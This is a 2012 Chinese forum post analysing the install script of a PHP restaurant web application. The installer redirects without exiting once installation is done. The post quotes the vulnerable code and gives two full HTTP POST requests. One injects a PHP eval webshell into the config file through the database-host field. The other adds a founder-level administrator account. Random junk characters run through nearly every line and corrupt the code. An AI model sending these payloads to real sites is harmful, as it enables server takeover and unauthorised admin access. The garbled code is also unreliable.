问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。8 z/ ?8 _7 E0 L. W @! y8 L$ ?8 B
+ H. s/ m: j1 Q% p( X; s3 H7 b. g
<?php" [8 _/ z% w& T
if(file_exists("../install.lock"))
$ O' Z- S! Y( t) C! T& j{
. j& A# d) L, H% E* j: U) K header("Location: ../");//没有退出( [% I& C/ m! e% ?
}, z/ U) k# [# R
; l" V4 j% E3 g! l" C2 E' D" U& C, h! S
//echo 'tst';exit;
+ P5 l. U- ?5 nrequire_once("init.php");
?3 G \* a4 {3 \- ]5 gif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
' D. N/ m8 L# l: ~, I{
9 \$ ~! ~0 Z4 v# ]% Q可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
* t/ ^, W: s, Y: ?8 y1 w) S0 o( V) f
$ W6 ]! \8 L2 m+ c1、getshell(很危险)
' P) |. D( n# i$ U" nif(empty($_REQUEST['step']) || $_REQUEST['step']==1): I+ T) U: B N
{
% A4 g& e8 `9 D6 _& j; D$smarty->assign("step",1);" [* A# s: {. G$ W9 Y
$smarty->display("index.html");
O" ]1 B, X3 a* K: q3 S}elseif($_REQUEST['step']==2)
2 g/ {- h/ }' W! A; H{
+ I0 D. Y$ f& G% l5 d $mysql_host=trim($_POST['mysql_host']);
" X1 E3 G) z, d( z+ P9 c $mysql_user=trim($_POST['mysql_user']);
+ v! B* |! ]. |% q% B) A $mysql_pwd=trim($_POST['mysql_pwd']);$ g0 [* \# x2 }& k9 C
$mysql_db=trim($_POST['mysql_db']);4 u6 ?" e/ ?: ?
$tblpre=trim($_POST['tblpre']);
6 Z" p1 `2 M# R* u $domain==trim($_POST['domain']);
5 W' r4 ~$ P% m; { d2 R $str="<?php \r\n";6 P- b: g* }' M7 E. o
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";: N! ~$ K2 Z4 ~2 m3 M+ \, _1 B
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
7 d& n5 M0 u- E$ i $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
6 Y' H+ k5 F$ c. ]& I8 T $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
' P+ e5 F! [. ^( M" f4 T* P $str.='define("MYSQL_CHARSET","GBK");'."\r\n";/ I( @( b% y+ h" q. S$ G( G5 y6 c
$str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
7 _( S- |8 Y Y: Q+ Q $str.='define("DOMAIN","'.$domain.'");'."\r\n";' @2 L L8 b' S+ |8 f- A) x7 h7 _
$str.='define("SKINS","default");'."\r\n";1 ?: w$ [" n A& L, v0 ]
$str.='?>';
; i$ g. E, u, W file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
' C$ A+ Z. H) V" c- ?* I7 h上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
' z8 ]0 U5 C( u& ePOST /canting/install/index.php?m=index&step=2 HTTP/1.1
- V ^& i1 ^2 u% S0 _0 LHost: 192.168.80.129
4 t) X0 N8 C% Q5 m/ ZUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0# a: `/ r1 @5 j- \3 ^# i9 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
4 B3 B3 k M+ c3 u U/ q0 qAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3( a6 S2 @, [- t
Accept-Encoding: gzip, deflate( F/ Y& }* X4 a9 c9 `8 d$ A% X
Referer: http://192.168.80.129/canting/install/index.php?step=1& n$ ~9 R; z1 m3 J8 r* Q0 V
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
# m# z. a: _! l/ n& h7 lContent-Type: application/x-www-form-urlencoded
5 l7 Z- ?7 b% q* N3 m& {Content-Length: 126
! b/ F2 Q* n: ^) d4 R$ }
/ V1 ]3 Q3 K2 i8 j5 W7 Omysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
( h8 I P/ J8 S, Y/ n; g* O: x但是这个方法很危险,将导致网站无法运行。
8 Z# r4 M/ u/ F" A
. D0 P$ d6 f8 {* f* K7 o, r1 E2、直接添加管理员
! f; A- R' N: V c; w6 @" C9 W1 t6 X7 O5 f1 [0 i6 Q# E, V
elseif($_REQUEST['step']==5)7 q8 O& L; Y" F( r4 c! d G8 `7 \
{
, b, f8 J o0 U F$ m if($_POST)* h4 F$ f5 \' e# k
{ require_once("../config/config.inc.php");
9 N8 i5 d4 P9 c. Z- a $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);% X4 n- U A) p' U: W- j4 A
mysql_select_db(MYSQL_DB,$link);
1 ]! |8 @! p' e mysql_query("SET NAMES ".MYSQL_CHARSET );0 E1 Q. `* ^# I Y: @2 w. `% K
mysql_query("SET sql_mode=''");. {. g7 ?- ^! J! U
" A9 ]1 @) _' a* |( t% ?% k# ] $adminname=trim($_POST['adminname']);; z z) G. B2 F, C1 k" ]- i
$pwd1=trim($_POST['pwd1']);, p7 R. I b4 N* }5 ]
$pwd2=trim($_POST['pwd2']);
h! Y0 j* q$ e# @ if(empty($adminname))
: L3 q% M% c$ @" F7 e( P1 o {) D2 a6 e( J6 W9 q
3 r9 A% i( Q& a1 ? echo "<script>alert('管理员不能为空');history.go(-1);</script>";
! { w: k) a8 M$ @ P7 x exit();' n8 g' b/ V5 F% i
}
7 G8 u$ _& e! ]& B if(($pwd1!=$pwd2) or empty($pwd1))6 g+ d/ k3 x2 _/ l! A h: G4 f
{
% | r9 o4 c5 o' i" s8 a$ Z, o echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
' }) t! Q- z4 w5 C2 u, n }9 H% d2 q2 V3 k; b$ I* ?3 b
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员, b: d- _2 w# P& ^
}
- C$ y" [) f: j1 O* e8 g3 u4 {这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:/ {0 @ r; r' S8 u
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
, l; F8 `) M5 w. n8 u) _: hHost: 192.168.80.129& |4 D; y3 }3 [' ]" c
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.04 u( a- }6 h% [5 L6 p3 X% e- s6 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
% k3 e* o- U7 F4 BAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.36 O. @ ^8 _' X6 B
Accept-Encoding: gzip, deflate
9 f$ U. T, k5 s; {0 ZReferer: http://www.2cto.com /canting/install/index.php?step=1- a9 K) U2 c1 O' v& v2 M
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42% v2 b5 z/ W+ g5 R% _
Content-Type: application/x-www-form-urlencoded
. X/ |0 w/ @6 X; v. O* S1 QContent-Length: 46
- K; I9 J* p' @, K
* B+ s; O$ y& ]% f0 Yadminname=qingshen&pwd1=qingshen&pwd2=qingshen
, a' H2 O% q- O4 E9 Y" P9 E |
发表于 2012-12-4 11:13:44
收藏
支持
反对